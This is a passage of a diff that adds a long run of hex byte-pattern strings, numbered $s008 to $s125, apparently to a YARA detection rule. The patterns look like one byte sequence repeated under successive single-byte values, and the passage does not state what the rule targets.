+		$s008 = { 08 09 08 09 08 0A ?? ?? 08 0A 08 09 08 0A ?? ?? 08 0B 08 0A 08 0C ?? ?? ?? ?? 08 0C 08 0A 08 0C ?? ?? ?? ?? 08 0D 08 09 08 0A ?? ?? }
+		$s009 = { 09 08 09 08 09 0B ?? ?? 09 0B 09 08 09 0B ?? ?? 09 0A 09 0B 09 0D ?? ?? ?? ?? 09 0D 09 0B 09 0D ?? ?? ?? ?? 09 0C 09 08 09 0B ?? ?? }
+		$s010 = { 0A 0B 0A 0B 0A 08 ?? ?? 0A 08 0A 0B 0A 08 ?? ?? 0A 09 0A 08 0A 0E ?? ?? ?? ?? 0A 0E 0A 08 0A 0E ?? ?? ?? ?? 0A 0F 0A 0B 0A 08 ?? ?? }
+		$s011 = { 0B 0A 0B 0A 0B 09 ?? ?? 0B 09 0B 0A 0B 09 ?? ?? 0B 08 0B 09 0B 0F ?? ?? ?? ?? 0B 0F 0B 09 0B 0F ?? ?? ?? ?? 0B 0E 0B 0A 0B 09 ?? ?? }
+		$s012 = { 0C 0D 0C 0D 0C 0E ?? ?? 0C 0E 0C 0D 0C 0E ?? ?? 0C 0F 0C 0E 0C 08 ?? ?? ?? ?? 0C 08 0C 0E 0C 08 ?? ?? ?? ?? 0C 09 0C 0D 0C 0E ?? ?? }
+		$s013 = { 0D 0C 0D 0C 0D 0F ?? ?? 0D 0F 0D 0C 0D 0F ?? ?? 0D 0E 0D 0F 0D 09 ?? ?? ?? ?? 0D 09 0D 0F 0D 09 ?? ?? ?? ?? 0D 08 0D 0C 0D 0F ?? ?? }
+		$s014 = { 0E 0F 0E 0F 0E 0C ?? ?? 0E 0C 0E 0F 0E 0C ?? ?? 0E 0D 0E 0C 0E 0A ?? ?? ?? ?? 0E 0A 0E 0C 0E 0A ?? ?? ?? ?? 0E 0B 0E 0F 0E 0C ?? ?? }
+		$s015 = { 0F 0E 0F 0E 0F 0D ?? ?? 0F 0D 0F 0E 0F 0D ?? ?? 0F 0C 0F 0D 0F 0B ?? ?? ?? ?? 0F 0B 0F 0D 0F 0B ?? ?? ?? ?? 0F 0A 0F 0E 0F 0D ?? ?? }
+		$s016 = { 10 11 10 11 10 12 ?? ?? 10 12 10 11 10 12 ?? ?? 10 13 10 12 10 14 ?? ?? ?? ?? 10 14 10 12 10 14 ?? ?? ?? ?? 10 15 10 11 10 12 ?? ?? }
+		$s017 = { 11 10 11 10 11 13 ?? ?? 11 13 11 10 11 13 ?? ?? 11 12 11 13 11 15 ?? ?? ?? ?? 11 15 11 13 11 15 ?? ?? ?? ?? 11 14 11 10 11 13 ?? ?? }
+		$s018 = { 12 13 12 13 12 10 ?? ?? 12 10 12 13 12 10 ?? ?? 12 11 12 10 12 16 ?? ?? ?? ?? 12 16 12 10 12 16 ?? ?? ?? ?? 12 17 12 13 12 10 ?? ?? }
+		$s019 = { 13 12 13 12 13 11 ?? ?? 13 11 13 12 13 11 ?? ?? 13 10 13 11 13 17 ?? ?? ?? ?? 13 17 13 11 13 17 ?? ?? ?? ?? 13 16 13 12 13 11 ?? ?? }
+		$s020 = { 14 15 14 15 14 16 ?? ?? 14 16 14 15 14 16 ?? ?? 14 17 14 16 14 10 ?? ?? ?? ?? 14 10 14 16 14 10 ?? ?? ?? ?? 14 11 14 15 14 16 ?? ?? }
+		$s021 = { 15 14 15 14 15 17 ?? ?? 15 17 15 14 15 17 ?? ?? 15 16 15 17 15 11 ?? ?? ?? ?? 15 11 15 17 15 11 ?? ?? ?? ?? 15 10 15 14 15 17 ?? ?? }
+		$s022 = { 16 17 16 17 16 14 ?? ?? 16 14 16 17 16 14 ?? ?? 16 15 16 14 16 12 ?? ?? ?? ?? 16 12 16 14 16 12 ?? ?? ?? ?? 16 13 16 17 16 14 ?? ?? }
+		$s023 = { 17 16 17 16 17 15 ?? ?? 17 15 17 16 17 15 ?? ?? 17 14 17 15 17 13 ?? ?? ?? ?? 17 13 17 15 17 13 ?? ?? ?? ?? 17 12 17 16 17 15 ?? ?? }
+		$s024 = { 18 19 18 19 18 1A ?? ?? 18 1A 18 19 18 1A ?? ?? 18 1B 18 1A 18 1C ?? ?? ?? ?? 18 1C 18 1A 18 1C ?? ?? ?? ?? 18 1D 18 19 18 1A ?? ?? }
+		$s025 = { 19 18 19 18 19 1B ?? ?? 19 1B 19 18 19 1B ?? ?? 19 1A 19 1B 19 1D ?? ?? ?? ?? 19 1D 19 1B 19 1D ?? ?? ?? ?? 19 1C 19 18 19 1B ?? ?? }
+		$s026 = { 1A 1B 1A 1B 1A 18 ?? ?? 1A 18 1A 1B 1A 18 ?? ?? 1A 19 1A 18 1A 1E ?? ?? ?? ?? 1A 1E 1A 18 1A 1E ?? ?? ?? ?? 1A 1F 1A 1B 1A 18 ?? ?? }
+		$s027 = { 1B 1A 1B 1A 1B 19 ?? ?? 1B 19 1B 1A 1B 19 ?? ?? 1B 18 1B 19 1B 1F ?? ?? ?? ?? 1B 1F 1B 19 1B 1F ?? ?? ?? ?? 1B 1E 1B 1A 1B 19 ?? ?? }
+		$s028 = { 1C 1D 1C 1D 1C 1E ?? ?? 1C 1E 1C 1D 1C 1E ?? ?? 1C 1F 1C 1E 1C 18 ?? ?? ?? ?? 1C 18 1C 1E 1C 18 ?? ?? ?? ?? 1C 19 1C 1D 1C 1E ?? ?? }
+		$s029 = { 1D 1C 1D 1C 1D 1F ?? ?? 1D 1F 1D 1C 1D 1F ?? ?? 1D 1E 1D 1F 1D 19 ?? ?? ?? ?? 1D 19 1D 1F 1D 19 ?? ?? ?? ?? 1D 18 1D 1C 1D 1F ?? ?? }
+		$s030 = { 1E 1F 1E 1F 1E 1C ?? ?? 1E 1C 1E 1F 1E 1C ?? ?? 1E 1D 1E 1C 1E 1A ?? ?? ?? ?? 1E 1A 1E 1C 1E 1A ?? ?? ?? ?? 1E 1B 1E 1F 1E 1C ?? ?? }
+		$s031 = { 1F 1E 1F 1E 1F 1D ?? ?? 1F 1D 1F 1E 1F 1D ?? ?? 1F 1C 1F 1D 1F 1B ?? ?? ?? ?? 1F 1B 1F 1D 1F 1B ?? ?? ?? ?? 1F 1A 1F 1E 1F 1D ?? ?? }
+		$s032 = { 20 21 20 21 20 22 ?? ?? 20 22 20 21 20 22 ?? ?? 20 23 20 22 20 24 ?? ?? ?? ?? 20 24 20 22 20 24 ?? ?? ?? ?? 20 25 20 21 20 22 ?? ?? }
+		$s033 = { 21 20 21 20 21 23 ?? ?? 21 23 21 20 21 23 ?? ?? 21 22 21 23 21 25 ?? ?? ?? ?? 21 25 21 23 21 25 ?? ?? ?? ?? 21 24 21 20 21 23 ?? ?? }
+		$s034 = { 22 23 22 23 22 20 ?? ?? 22 20 22 23 22 20 ?? ?? 22 21 22 20 22 26 ?? ?? ?? ?? 22 26 22 20 22 26 ?? ?? ?? ?? 22 27 22 23 22 20 ?? ?? }
+		$s035 = { 23 22 23 22 23 21 ?? ?? 23 21 23 22 23 21 ?? ?? 23 20 23 21 23 27 ?? ?? ?? ?? 23 27 23 21 23 27 ?? ?? ?? ?? 23 26 23 22 23 21 ?? ?? }
+		$s036 = { 24 25 24 25 24 26 ?? ?? 24 26 24 25 24 26 ?? ?? 24 27 24 26 24 20 ?? ?? ?? ?? 24 20 24 26 24 20 ?? ?? ?? ?? 24 21 24 25 24 26 ?? ?? }
+		$s037 = { 25 24 25 24 25 27 ?? ?? 25 27 25 24 25 27 ?? ?? 25 26 25 27 25 21 ?? ?? ?? ?? 25 21 25 27 25 21 ?? ?? ?? ?? 25 20 25 24 25 27 ?? ?? }
+		$s038 = { 26 27 26 27 26 24 ?? ?? 26 24 26 27 26 24 ?? ?? 26 25 26 24 26 22 ?? ?? ?? ?? 26 22 26 24 26 22 ?? ?? ?? ?? 26 23 26 27 26 24 ?? ?? }
+		$s039 = { 27 26 27 26 27 25 ?? ?? 27 25 27 26 27 25 ?? ?? 27 24 27 25 27 23 ?? ?? ?? ?? 27 23 27 25 27 23 ?? ?? ?? ?? 27 22 27 26 27 25 ?? ?? }
+		$s040 = { 28 29 28 29 28 2A ?? ?? 28 2A 28 29 28 2A ?? ?? 28 2B 28 2A 28 2C ?? ?? ?? ?? 28 2C 28 2A 28 2C ?? ?? ?? ?? 28 2D 28 29 28 2A ?? ?? }
+		$s041 = { 29 28 29 28 29 2B ?? ?? 29 2B 29 28 29 2B ?? ?? 29 2A 29 2B 29 2D ?? ?? ?? ?? 29 2D 29 2B 29 2D ?? ?? ?? ?? 29 2C 29 28 29 2B ?? ?? }
+		$s042 = { 2A 2B 2A 2B 2A 28 ?? ?? 2A 28 2A 2B 2A 28 ?? ?? 2A 29 2A 28 2A 2E ?? ?? ?? ?? 2A 2E 2A 28 2A 2E ?? ?? ?? ?? 2A 2F 2A 2B 2A 28 ?? ?? }
+		$s043 = { 2B 2A 2B 2A 2B 29 ?? ?? 2B 29 2B 2A 2B 29 ?? ?? 2B 28 2B 29 2B 2F ?? ?? ?? ?? 2B 2F 2B 29 2B 2F ?? ?? ?? ?? 2B 2E 2B 2A 2B 29 ?? ?? }
+		$s044 = { 2C 2D 2C 2D 2C 2E ?? ?? 2C 2E 2C 2D 2C 2E ?? ?? 2C 2F 2C 2E 2C 28 ?? ?? ?? ?? 2C 28 2C 2E 2C 28 ?? ?? ?? ?? 2C 29 2C 2D 2C 2E ?? ?? }
+		$s045 = { 2D 2C 2D 2C 2D 2F ?? ?? 2D 2F 2D 2C 2D 2F ?? ?? 2D 2E 2D 2F 2D 29 ?? ?? ?? ?? 2D 29 2D 2F 2D 29 ?? ?? ?? ?? 2D 28 2D 2C 2D 2F ?? ?? }
+		$s046 = { 2E 2F 2E 2F 2E 2C ?? ?? 2E 2C 2E 2F 2E 2C ?? ?? 2E 2D 2E 2C 2E 2A ?? ?? ?? ?? 2E 2A 2E 2C 2E 2A ?? ?? ?? ?? 2E 2B 2E 2F 2E 2C ?? ?? }
+		$s047 = { 2F 2E 2F 2E 2F 2D ?? ?? 2F 2D 2F 2E 2F 2D ?? ?? 2F 2C 2F 2D 2F 2B ?? ?? ?? ?? 2F 2B 2F 2D 2F 2B ?? ?? ?? ?? 2F 2A 2F 2E 2F 2D ?? ?? }
+		$s048 = { 30 31 30 31 30 32 ?? ?? 30 32 30 31 30 32 ?? ?? 30 33 30 32 30 34 ?? ?? ?? ?? 30 34 30 32 30 34 ?? ?? ?? ?? 30 35 30 31 30 32 ?? ?? }
+		$s049 = { 31 30 31 30 31 33 ?? ?? 31 33 31 30 31 33 ?? ?? 31 32 31 33 31 35 ?? ?? ?? ?? 31 35 31 33 31 35 ?? ?? ?? ?? 31 34 31 30 31 33 ?? ?? }
+		$s050 = { 32 33 32 33 32 30 ?? ?? 32 30 32 33 32 30 ?? ?? 32 31 32 30 32 36 ?? ?? ?? ?? 32 36 32 30 32 36 ?? ?? ?? ?? 32 37 32 33 32 30 ?? ?? }
+		$s051 = { 33 32 33 32 33 31 ?? ?? 33 31 33 32 33 31 ?? ?? 33 30 33 31 33 37 ?? ?? ?? ?? 33 37 33 31 33 37 ?? ?? ?? ?? 33 36 33 32 33 31 ?? ?? }
+		$s052 = { 34 35 34 35 34 36 ?? ?? 34 36 34 35 34 36 ?? ?? 34 37 34 36 34 30 ?? ?? ?? ?? 34 30 34 36 34 30 ?? ?? ?? ?? 34 31 34 35 34 36 ?? ?? }
+		$s053 = { 35 34 35 34 35 37 ?? ?? 35 37 35 34 35 37 ?? ?? 35 36 35 37 35 31 ?? ?? ?? ?? 35 31 35 37 35 31 ?? ?? ?? ?? 35 30 35 34 35 37 ?? ?? }
+		$s054 = { 36 37 36 37 36 34 ?? ?? 36 34 36 37 36 34 ?? ?? 36 35 36 34 36 32 ?? ?? ?? ?? 36 32 36 34 36 32 ?? ?? ?? ?? 36 33 36 37 36 34 ?? ?? }
+		$s055 = { 37 36 37 36 37 35 ?? ?? 37 35 37 36 37 35 ?? ?? 37 34 37 35 37 33 ?? ?? ?? ?? 37 33 37 35 37 33 ?? ?? ?? ?? 37 32 37 36 37 35 ?? ?? }
+		$s056 = { 38 39 38 39 38 3A ?? ?? 38 3A 38 39 38 3A ?? ?? 38 3B 38 3A 38 3C ?? ?? ?? ?? 38 3C 38 3A 38 3C ?? ?? ?? ?? 38 3D 38 39 38 3A ?? ?? }
+		$s057 = { 39 38 39 38 39 3B ?? ?? 39 3B 39 38 39 3B ?? ?? 39 3A 39 3B 39 3D ?? ?? ?? ?? 39 3D 39 3B 39 3D ?? ?? ?? ?? 39 3C 39 38 39 3B ?? ?? }
+		$s058 = { 3A 3B 3A 3B 3A 38 ?? ?? 3A 38 3A 3B 3A 38 ?? ?? 3A 39 3A 38 3A 3E ?? ?? ?? ?? 3A 3E 3A 38 3A 3E ?? ?? ?? ?? 3A 3F 3A 3B 3A 38 ?? ?? }
+		$s059 = { 3B 3A 3B 3A 3B 39 ?? ?? 3B 39 3B 3A 3B 39 ?? ?? 3B 38 3B 39 3B 3F ?? ?? ?? ?? 3B 3F 3B 39 3B 3F ?? ?? ?? ?? 3B 3E 3B 3A 3B 39 ?? ?? }
+		$s060 = { 3C 3D 3C 3D 3C 3E ?? ?? 3C 3E 3C 3D 3C 3E ?? ?? 3C 3F 3C 3E 3C 38 ?? ?? ?? ?? 3C 38 3C 3E 3C 38 ?? ?? ?? ?? 3C 39 3C 3D 3C 3E ?? ?? }
+		$s061 = { 3D 3C 3D 3C 3D 3F ?? ?? 3D 3F 3D 3C 3D 3F ?? ?? 3D 3E 3D 3F 3D 39 ?? ?? ?? ?? 3D 39 3D 3F 3D 39 ?? ?? ?? ?? 3D 38 3D 3C 3D 3F ?? ?? }
+		$s062 = { 3E 3F 3E 3F 3E 3C ?? ?? 3E 3C 3E 3F 3E 3C ?? ?? 3E 3D 3E 3C 3E 3A ?? ?? ?? ?? 3E 3A 3E 3C 3E 3A ?? ?? ?? ?? 3E 3B 3E 3F 3E 3C ?? ?? }
+		$s063 = { 3F 3E 3F 3E 3F 3D ?? ?? 3F 3D 3F 3E 3F 3D ?? ?? 3F 3C 3F 3D 3F 3B ?? ?? ?? ?? 3F 3B 3F 3D 3F 3B ?? ?? ?? ?? 3F 3A 3F 3E 3F 3D ?? ?? }
+		$s064 = { 40 41 40 41 40 42 ?? ?? 40 42 40 41 40 42 ?? ?? 40 43 40 42 40 44 ?? ?? ?? ?? 40 44 40 42 40 44 ?? ?? ?? ?? 40 45 40 41 40 42 ?? ?? }
+		$s065 = { 41 40 41 40 41 43 ?? ?? 41 43 41 40 41 43 ?? ?? 41 42 41 43 41 45 ?? ?? ?? ?? 41 45 41 43 41 45 ?? ?? ?? ?? 41 44 41 40 41 43 ?? ?? }
+		$s066 = { 42 43 42 43 42 40 ?? ?? 42 40 42 43 42 40 ?? ?? 42 41 42 40 42 46 ?? ?? ?? ?? 42 46 42 40 42 46 ?? ?? ?? ?? 42 47 42 43 42 40 ?? ?? }
+		$s067 = { 43 42 43 42 43 41 ?? ?? 43 41 43 42 43 41 ?? ?? 43 40 43 41 43 47 ?? ?? ?? ?? 43 47 43 41 43 47 ?? ?? ?? ?? 43 46 43 42 43 41 ?? ?? }
+		$s068 = { 44 45 44 45 44 46 ?? ?? 44 46 44 45 44 46 ?? ?? 44 47 44 46 44 40 ?? ?? ?? ?? 44 40 44 46 44 40 ?? ?? ?? ?? 44 41 44 45 44 46 ?? ?? }
+		$s069 = { 45 44 45 44 45 47 ?? ?? 45 47 45 44 45 47 ?? ?? 45 46 45 47 45 41 ?? ?? ?? ?? 45 41 45 47 45 41 ?? ?? ?? ?? 45 40 45 44 45 47 ?? ?? }
+		$s070 = { 46 47 46 47 46 44 ?? ?? 46 44 46 47 46 44 ?? ?? 46 45 46 44 46 42 ?? ?? ?? ?? 46 42 46 44 46 42 ?? ?? ?? ?? 46 43 46 47 46 44 ?? ?? }
+		$s071 = { 47 46 47 46 47 45 ?? ?? 47 45 47 46 47 45 ?? ?? 47 44 47 45 47 43 ?? ?? ?? ?? 47 43 47 45 47 43 ?? ?? ?? ?? 47 42 47 46 47 45 ?? ?? }
+		$s072 = { 48 49 48 49 48 4A ?? ?? 48 4A 48 49 48 4A ?? ?? 48 4B 48 4A 48 4C ?? ?? ?? ?? 48 4C 48 4A 48 4C ?? ?? ?? ?? 48 4D 48 49 48 4A ?? ?? }
+		$s073 = { 49 48 49 48 49 4B ?? ?? 49 4B 49 48 49 4B ?? ?? 49 4A 49 4B 49 4D ?? ?? ?? ?? 49 4D 49 4B 49 4D ?? ?? ?? ?? 49 4C 49 48 49 4B ?? ?? }
+		$s074 = { 4A 4B 4A 4B 4A 48 ?? ?? 4A 48 4A 4B 4A 48 ?? ?? 4A 49 4A 48 4A 4E ?? ?? ?? ?? 4A 4E 4A 48 4A 4E ?? ?? ?? ?? 4A 4F 4A 4B 4A 48 ?? ?? }
+		$s075 = { 4B 4A 4B 4A 4B 49 ?? ?? 4B 49 4B 4A 4B 49 ?? ?? 4B 48 4B 49 4B 4F ?? ?? ?? ?? 4B 4F 4B 49 4B 4F ?? ?? ?? ?? 4B 4E 4B 4A 4B 49 ?? ?? }
+		$s076 = { 4C 4D 4C 4D 4C 4E ?? ?? 4C 4E 4C 4D 4C 4E ?? ?? 4C 4F 4C 4E 4C 48 ?? ?? ?? ?? 4C 48 4C 4E 4C 48 ?? ?? ?? ?? 4C 49 4C 4D 4C 4E ?? ?? }
+		$s077 = { 4D 4C 4D 4C 4D 4F ?? ?? 4D 4F 4D 4C 4D 4F ?? ?? 4D 4E 4D 4F 4D 49 ?? ?? ?? ?? 4D 49 4D 4F 4D 49 ?? ?? ?? ?? 4D 48 4D 4C 4D 4F ?? ?? }
+		$s078 = { 4E 4F 4E 4F 4E 4C ?? ?? 4E 4C 4E 4F 4E 4C ?? ?? 4E 4D 4E 4C 4E 4A ?? ?? ?? ?? 4E 4A 4E 4C 4E 4A ?? ?? ?? ?? 4E 4B 4E 4F 4E 4C ?? ?? }
+		$s079 = { 4F 4E 4F 4E 4F 4D ?? ?? 4F 4D 4F 4E 4F 4D ?? ?? 4F 4C 4F 4D 4F 4B ?? ?? ?? ?? 4F 4B 4F 4D 4F 4B ?? ?? ?? ?? 4F 4A 4F 4E 4F 4D ?? ?? }
+		$s080 = { 50 51 50 51 50 52 ?? ?? 50 52 50 51 50 52 ?? ?? 50 53 50 52 50 54 ?? ?? ?? ?? 50 54 50 52 50 54 ?? ?? ?? ?? 50 55 50 51 50 52 ?? ?? }
+		$s081 = { 51 50 51 50 51 53 ?? ?? 51 53 51 50 51 53 ?? ?? 51 52 51 53 51 55 ?? ?? ?? ?? 51 55 51 53 51 55 ?? ?? ?? ?? 51 54 51 50 51 53 ?? ?? }
+		$s082 = { 52 53 52 53 52 50 ?? ?? 52 50 52 53 52 50 ?? ?? 52 51 52 50 52 56 ?? ?? ?? ?? 52 56 52 50 52 56 ?? ?? ?? ?? 52 57 52 53 52 50 ?? ?? }
+		$s083 = { 53 52 53 52 53 51 ?? ?? 53 51 53 52 53 51 ?? ?? 53 50 53 51 53 57 ?? ?? ?? ?? 53 57 53 51 53 57 ?? ?? ?? ?? 53 56 53 52 53 51 ?? ?? }
+		$s084 = { 54 55 54 55 54 56 ?? ?? 54 56 54 55 54 56 ?? ?? 54 57 54 56 54 50 ?? ?? ?? ?? 54 50 54 56 54 50 ?? ?? ?? ?? 54 51 54 55 54 56 ?? ?? }
+		$s085 = { 55 54 55 54 55 57 ?? ?? 55 57 55 54 55 57 ?? ?? 55 56 55 57 55 51 ?? ?? ?? ?? 55 51 55 57 55 51 ?? ?? ?? ?? 55 50 55 54 55 57 ?? ?? }
+		$s086 = { 56 57 56 57 56 54 ?? ?? 56 54 56 57 56 54 ?? ?? 56 55 56 54 56 52 ?? ?? ?? ?? 56 52 56 54 56 52 ?? ?? ?? ?? 56 53 56 57 56 54 ?? ?? }
+		$s087 = { 57 56 57 56 57 55 ?? ?? 57 55 57 56 57 55 ?? ?? 57 54 57 55 57 53 ?? ?? ?? ?? 57 53 57 55 57 53 ?? ?? ?? ?? 57 52 57 56 57 55 ?? ?? }
+		$s088 = { 58 59 58 59 58 5A ?? ?? 58 5A 58 59 58 5A ?? ?? 58 5B 58 5A 58 5C ?? ?? ?? ?? 58 5C 58 5A 58 5C ?? ?? ?? ?? 58 5D 58 59 58 5A ?? ?? }
+		$s089 = { 59 58 59 58 59 5B ?? ?? 59 5B 59 58 59 5B ?? ?? 59 5A 59 5B 59 5D ?? ?? ?? ?? 59 5D 59 5B 59 5D ?? ?? ?? ?? 59 5C 59 58 59 5B ?? ?? }
+		$s090 = { 5A 5B 5A 5B 5A 58 ?? ?? 5A 58 5A 5B 5A 58 ?? ?? 5A 59 5A 58 5A 5E ?? ?? ?? ?? 5A 5E 5A 58 5A 5E ?? ?? ?? ?? 5A 5F 5A 5B 5A 58 ?? ?? }
+		$s091 = { 5B 5A 5B 5A 5B 59 ?? ?? 5B 59 5B 5A 5B 59 ?? ?? 5B 58 5B 59 5B 5F ?? ?? ?? ?? 5B 5F 5B 59 5B 5F ?? ?? ?? ?? 5B 5E 5B 5A 5B 59 ?? ?? }
+		$s092 = { 5C 5D 5C 5D 5C 5E ?? ?? 5C 5E 5C 5D 5C 5E ?? ?? 5C 5F 5C 5E 5C 58 ?? ?? ?? ?? 5C 58 5C 5E 5C 58 ?? ?? ?? ?? 5C 59 5C 5D 5C 5E ?? ?? }
+		$s093 = { 5D 5C 5D 5C 5D 5F ?? ?? 5D 5F 5D 5C 5D 5F ?? ?? 5D 5E 5D 5F 5D 59 ?? ?? ?? ?? 5D 59 5D 5F 5D 59 ?? ?? ?? ?? 5D 58 5D 5C 5D 5F ?? ?? }
+		$s094 = { 5E 5F 5E 5F 5E 5C ?? ?? 5E 5C 5E 5F 5E 5C ?? ?? 5E 5D 5E 5C 5E 5A ?? ?? ?? ?? 5E 5A 5E 5C 5E 5A ?? ?? ?? ?? 5E 5B 5E 5F 5E 5C ?? ?? }
+		$s095 = { 5F 5E 5F 5E 5F 5D ?? ?? 5F 5D 5F 5E 5F 5D ?? ?? 5F 5C 5F 5D 5F 5B ?? ?? ?? ?? 5F 5B 5F 5D 5F 5B ?? ?? ?? ?? 5F 5A 5F 5E 5F 5D ?? ?? }
+		$s096 = { 60 61 60 61 60 62 ?? ?? 60 62 60 61 60 62 ?? ?? 60 63 60 62 60 64 ?? ?? ?? ?? 60 64 60 62 60 64 ?? ?? ?? ?? 60 65 60 61 60 62 ?? ?? }
+		$s097 = { 61 60 61 60 61 63 ?? ?? 61 63 61 60 61 63 ?? ?? 61 62 61 63 61 65 ?? ?? ?? ?? 61 65 61 63 61 65 ?? ?? ?? ?? 61 64 61 60 61 63 ?? ?? }
+		$s098 = { 62 63 62 63 62 60 ?? ?? 62 60 62 63 62 60 ?? ?? 62 61 62 60 62 66 ?? ?? ?? ?? 62 66 62 60 62 66 ?? ?? ?? ?? 62 67 62 63 62 60 ?? ?? }
+		$s099 = { 63 62 63 62 63 61 ?? ?? 63 61 63 62 63 61 ?? ?? 63 60 63 61 63 67 ?? ?? ?? ?? 63 67 63 61 63 67 ?? ?? ?? ?? 63 66 63 62 63 61 ?? ?? }
+		$s100 = { 64 65 64 65 64 66 ?? ?? 64 66 64 65 64 66 ?? ?? 64 67 64 66 64 60 ?? ?? ?? ?? 64 60 64 66 64 60 ?? ?? ?? ?? 64 61 64 65 64 66 ?? ?? }
+		$s101 = { 65 64 65 64 65 67 ?? ?? 65 67 65 64 65 67 ?? ?? 65 66 65 67 65 61 ?? ?? ?? ?? 65 61 65 67 65 61 ?? ?? ?? ?? 65 60 65 64 65 67 ?? ?? }
+		$s102 = { 66 67 66 67 66 64 ?? ?? 66 64 66 67 66 64 ?? ?? 66 65 66 64 66 62 ?? ?? ?? ?? 66 62 66 64 66 62 ?? ?? ?? ?? 66 63 66 67 66 64 ?? ?? }
+		$s103 = { 67 66 67 66 67 65 ?? ?? 67 65 67 66 67 65 ?? ?? 67 64 67 65 67 63 ?? ?? ?? ?? 67 63 67 65 67 63 ?? ?? ?? ?? 67 62 67 66 67 65 ?? ?? }
+		$s104 = { 68 69 68 69 68 6A ?? ?? 68 6A 68 69 68 6A ?? ?? 68 6B 68 6A 68 6C ?? ?? ?? ?? 68 6C 68 6A 68 6C ?? ?? ?? ?? 68 6D 68 69 68 6A ?? ?? }
+		$s105 = { 69 68 69 68 69 6B ?? ?? 69 6B 69 68 69 6B ?? ?? 69 6A 69 6B 69 6D ?? ?? ?? ?? 69 6D 69 6B 69 6D ?? ?? ?? ?? 69 6C 69 68 69 6B ?? ?? }
+		$s106 = { 6A 6B 6A 6B 6A 68 ?? ?? 6A 68 6A 6B 6A 68 ?? ?? 6A 69 6A 68 6A 6E ?? ?? ?? ?? 6A 6E 6A 68 6A 6E ?? ?? ?? ?? 6A 6F 6A 6B 6A 68 ?? ?? }
+		$s107 = { 6B 6A 6B 6A 6B 69 ?? ?? 6B 69 6B 6A 6B 69 ?? ?? 6B 68 6B 69 6B 6F ?? ?? ?? ?? 6B 6F 6B 69 6B 6F ?? ?? ?? ?? 6B 6E 6B 6A 6B 69 ?? ?? }
+		$s108 = { 6C 6D 6C 6D 6C 6E ?? ?? 6C 6E 6C 6D 6C 6E ?? ?? 6C 6F 6C 6E 6C 68 ?? ?? ?? ?? 6C 68 6C 6E 6C 68 ?? ?? ?? ?? 6C 69 6C 6D 6C 6E ?? ?? }
+		$s109 = { 6D 6C 6D 6C 6D 6F ?? ?? 6D 6F 6D 6C 6D 6F ?? ?? 6D 6E 6D 6F 6D 69 ?? ?? ?? ?? 6D 69 6D 6F 6D 69 ?? ?? ?? ?? 6D 68 6D 6C 6D 6F ?? ?? }
+		$s110 = { 6E 6F 6E 6F 6E 6C ?? ?? 6E 6C 6E 6F 6E 6C ?? ?? 6E 6D 6E 6C 6E 6A ?? ?? ?? ?? 6E 6A 6E 6C 6E 6A ?? ?? ?? ?? 6E 6B 6E 6F 6E 6C ?? ?? }
+		$s111 = { 6F 6E 6F 6E 6F 6D ?? ?? 6F 6D 6F 6E 6F 6D ?? ?? 6F 6C 6F 6D 6F 6B ?? ?? ?? ?? 6F 6B 6F 6D 6F 6B ?? ?? ?? ?? 6F 6A 6F 6E 6F 6D ?? ?? }
+		$s112 = { 70 71 70 71 70 72 ?? ?? 70 72 70 71 70 72 ?? ?? 70 73 70 72 70 74 ?? ?? ?? ?? 70 74 70 72 70 74 ?? ?? ?? ?? 70 75 70 71 70 72 ?? ?? }
+		$s113 = { 71 70 71 70 71 73 ?? ?? 71 73 71 70 71 73 ?? ?? 71 72 71 73 71 75 ?? ?? ?? ?? 71 75 71 73 71 75 ?? ?? ?? ?? 71 74 71 70 71 73 ?? ?? }
+		$s114 = { 72 73 72 73 72 70 ?? ?? 72 70 72 73 72 70 ?? ?? 72 71 72 70 72 76 ?? ?? ?? ?? 72 76 72 70 72 76 ?? ?? ?? ?? 72 77 72 73 72 70 ?? ?? }
+		$s115 = { 73 72 73 72 73 71 ?? ?? 73 71 73 72 73 71 ?? ?? 73 70 73 71 73 77 ?? ?? ?? ?? 73 77 73 71 73 77 ?? ?? ?? ?? 73 76 73 72 73 71 ?? ?? }
+		$s116 = { 74 75 74 75 74 76 ?? ?? 74 76 74 75 74 76 ?? ?? 74 77 74 76 74 70 ?? ?? ?? ?? 74 70 74 76 74 70 ?? ?? ?? ?? 74 71 74 75 74 76 ?? ?? }
+		$s117 = { 75 74 75 74 75 77 ?? ?? 75 77 75 74 75 77 ?? ?? 75 76 75 77 75 71 ?? ?? ?? ?? 75 71 75 77 75 71 ?? ?? ?? ?? 75 70 75 74 75 77 ?? ?? }
+		$s118 = { 76 77 76 77 76 74 ?? ?? 76 74 76 77 76 74 ?? ?? 76 75 76 74 76 72 ?? ?? ?? ?? 76 72 76 74 76 72 ?? ?? ?? ?? 76 73 76 77 76 74 ?? ?? }
+		$s119 = { 77 76 77 76 77 75 ?? ?? 77 75 77 76 77 75 ?? ?? 77 74 77 75 77 73 ?? ?? ?? ?? 77 73 77 75 77 73 ?? ?? ?? ?? 77 72 77 76 77 75 ?? ?? }
+		$s120 = { 78 79 78 79 78 7A ?? ?? 78 7A 78 79 78 7A ?? ?? 78 7B 78 7A 78 7C ?? ?? ?? ?? 78 7C 78 7A 78 7C ?? ?? ?? ?? 78 7D 78 79 78 7A ?? ?? }
+		$s121 = { 79 78 79 78 79 7B ?? ?? 79 7B 79 78 79 7B ?? ?? 79 7A 79 7B 79 7D ?? ?? ?? ?? 79 7D 79 7B 79 7D ?? ?? ?? ?? 79 7C 79 78 79 7B ?? ?? }
+		$s122 = { 7A 7B 7A 7B 7A 78 ?? ?? 7A 78 7A 7B 7A 78 ?? ?? 7A 79 7A 78 7A 7E ?? ?? ?? ?? 7A 7E 7A 78 7A 7E ?? ?? ?? ?? 7A 7F 7A 7B 7A 78 ?? ?? }
+		$s123 = { 7B 7A 7B 7A 7B 79 ?? ?? 7B 79 7B 7A 7B 79 ?? ?? 7B 78 7B 79 7B 7F ?? ?? ?? ?? 7B 7F 7B 79 7B 7F ?? ?? ?? ?? 7B 7E 7B 7A 7B 79 ?? ?? }
+		$s124 = { 7C 7D 7C 7D 7C 7E ?? ?? 7C 7E 7C 7D 7C 7E ?? ?? 7C 7F 7C 7E 7C 78 ?? ?? ?? ?? 7C 78 7C 7E 7C 78 ?? ?? ?? ?? 7C 79 7C 7D 7C 7E ?? ?? }
+		$s125 = { 7D 7C 7D 7C 7D 7F ?? ?? 7D 7F 7D 7C 7D 7F ?? ?? 7D 7E 7D 7F 7D 79 ?? ?? ?? ?? 7D 79 7D 7F 7D 79 ?? ?? ?? ?? 7D 78 7D 7C 7D 7F ?? ?? }
